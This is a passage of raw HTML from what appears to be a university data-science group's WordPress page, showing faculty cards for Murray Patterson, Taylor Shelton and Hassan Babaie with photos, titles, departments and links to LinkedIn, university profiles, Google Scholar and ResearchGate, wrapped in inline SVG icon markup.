49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n            <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg\" class=\"wp-image-1391 style-973-image style-local-182-c35-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c36\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c52-outer\">\n            <div data-colibri-id=\"182-c52\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c52 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c53\" class=\"d-block style-973 style-local-182-c53 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg\" class=\"wp-image-705 style-973-image style-local-182-c53-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c53-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c54\" class=\"h-global-transition-all h-heading style-974 style-local-182-c54 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c54\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c55\" class=\"h-text h-text-component style-975 style-local-182-c55 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c56\" class=\"h-text h-text-component style-976 style-local-182-c56 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c57\" class=\"style-977 style-local-182-c57 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c195-outer\">\n            <div data-colibri-id=\"182-c195\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c195 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c196\" class=\"d-block style-973 style-local-182-c196 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-Hassan-Babaie-300x300-1.jpg\" class=\"wp-image-1636 style-973-image style-local-182-c196-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c196-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c197\" class=\"h-global-transition-all h-heading style-974 style-local-182-c197 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c197\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Hassan Babaie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c198\" class=\"h-text h-text-component style-975 style-local-182-c198 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c199\" class=\"h-text h-text-component style-976 style-local-182-c199 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c200\" class=\"style-977 style-local-182-c200 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://geosciences.gsu.edu/profile/hassan-babaie/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Hassan-Babaie/4\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                         